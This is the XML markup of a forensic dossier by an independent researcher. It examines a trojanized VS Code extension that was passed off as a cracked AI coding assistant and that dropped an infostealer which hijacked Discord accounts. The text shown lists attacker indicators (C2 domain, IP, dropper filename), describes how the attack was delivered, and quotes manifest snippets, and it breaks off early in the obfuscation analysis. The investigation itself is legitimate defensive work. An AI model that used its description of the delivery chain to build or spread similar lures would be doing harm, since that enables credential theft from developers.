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0"/>
        </w:rPr>
        <w:t>FORENSIC INVESTIGATION &amp; INCIDENT RESPONSE DOSSIER (REVISED)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9936"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9936"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="0F172A"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Project Codename: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Operation Alpme / Trojanized Extension Deconstruction</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Lead Investigator &amp; Author: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PenguinBTW (Independent Security Researcher, Year 13)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Copyright: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>© 2026 PenguinBTW. All Rights Reserved.</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigation Date: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>October 26–27, 2026 (Revised Edition)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Classification: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trojanized Extension / Staged Dropper &amp; Infostealer (Infostealer/Win.Lzveil, Trojan:Win32/Wacatac, MalwareX-gen [Pws])</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Artifact: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>alpme-1.0.25.vsix / alpme-1.0.25.zip (dist/extension.js, 36.6 MB)</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="2" w:color="0F172A"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Executive Summary &amp; Incident Chronology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This technical dossier details an end-to-end digital forensics and incident response (DFIR) investigation conducted by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PenguinBTW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a backdoored Visual Studio Code extension named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Alpme (version 1.0.25)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Distributed across YouTube tutorials and Discord developer communities as a "cracked" autonomous AI coding assistant purportedly providing free access to proprietary LLMs (Claude 3.7 Sonnet), the extension was actually a trojanized supply-chain lure. The software base of an open-source coding tool (Roo Code / Cline) was modified to bundle an obfuscated staged dropper that downloads and executes secondary malicious payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Observed Impact: Active Discord Account Takeovers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Shortly following community distribution, multiple Discord users who installed and activated the extension reported unauthorized takeovers of their Discord accounts. Threat actors leveraged stolen session tokens and saved browser credentials to hijack victim accounts without triggering standard password prompts. Subsequent reverse engineering and antivirus endpoint analysis confirmed that the dropped binary was an active infostealer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infostealer/Win.Lzveil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), corroborating these community compromise reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Timeline of Key Events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Initial Distribution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Observed fraudulent YouTube tutorial and Discord announcements by community channel "The Tech King" promoting the cracked VSIX package.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Community Alert &amp; Takedown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Discrepancies in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unauthorized API endpoints and build obfuscators) were identified and surfaced to the distributor on Discord. The distributor removed the promotional video and issued a community uninstallation warning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Account Compromises Surface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Multiple users who executed the extension reported compromised Discord sessions and unauthorized activity across connected developer accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sandbox Containment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Sealed analysis environment in an isolated Windows 11 VirtualBox virtual machine with host-only networking, disabled clipboards, and unmounted shared folders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Static Deobfuscation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unpacked and deobfuscated the 36.6 MB monolithic JavaScript bundle using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>webcrack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Node.js with expanded memory heaps, exposing the payload retrieval pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Infrastructure Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Mapped C2 communication to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https://alpme.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and identified an unmasked origin IP address at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31.57.201.86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosted on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>AS40662 (Layer7 Technologies Inc.)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the United Arab Emirates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tooling Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Authored a zero-dependency batch/PowerShell forensic auditor capable of reading locked VS Code SQLite databases (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>state.vscdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) and scanning memory and temporary directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Live Remediation &amp; Sample Capture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Deployed the audit utility to an infected community member, isolating the physical malware executable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>25si.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%\pkg-4a3cded7\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and extracting its SHA-256 hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Multi-Vendor Antivirus Confirmation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Submitted the extracted binary to VirusTotal, securing confirmed classifications as an infostealer and trojan dropper from AhnLab (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infostealer/Win.Lzveil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), Avast (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Password Stealer [Pws]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), Microsoft Defender (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Trojan:Win32/Wacatac.B!ml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), Malwarebytes, ESET, and CrowdStrike Falcon.</w:t>
      </w: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2. Trojanized Packaging &amp; Delivery Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The threat actors leveraged a classic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Trojan Horse / Dual-Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vector:</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flowchart TD</w:t>
              <w:br/>
              <w:t xml:space="preserve">    A["Legitimate Open-Source Tool&lt;br/&gt;(Cline / Roo Code Base)"] --&gt; B["Attacker Modifications&lt;br/&gt;(Injected Staged Dropper in extension.js)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    B --&gt; C["Repackaged VSIX Archive&lt;br/&gt;(alpme-1.0.25.vsix)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    C --&gt; D["Social Engineering Delivery&lt;br/&gt;(YouTube Tutorial / Discord Links)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    D --&gt; E["Developer Workstations&lt;br/&gt;(Execution with User Privileges)"]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Manifest Disclosures (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decompression of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alpme-1.0.25.vsix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> revealed immediate anomalies in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Custom hardcoded network endpoints:</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 xml:space="preserve">  "alpme.baseUrl": "https://alpme.com",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "alpme.clientToken": "..."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Inclusion of obfuscation dependencies:</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 xml:space="preserve">  "devDependencies": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "javascript-obfuscator": "^5.8.0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The presence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>javascript-obfuscator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an open-source productivity extension was an immediate red flag, signaling intentional obfuscation of the shipped runtime code.</w:t>
      </w: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3. Obfuscation &amp; Evasion Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The main extension file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dist/extension.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) comprised over 613,000 lines of minified, obfuscated JavaScript. The obfuscation pattern matched standard output from the open-source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>javascript-obfuscator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility configured with aggressive transformations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>1. String Array Pooling &amp; Rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
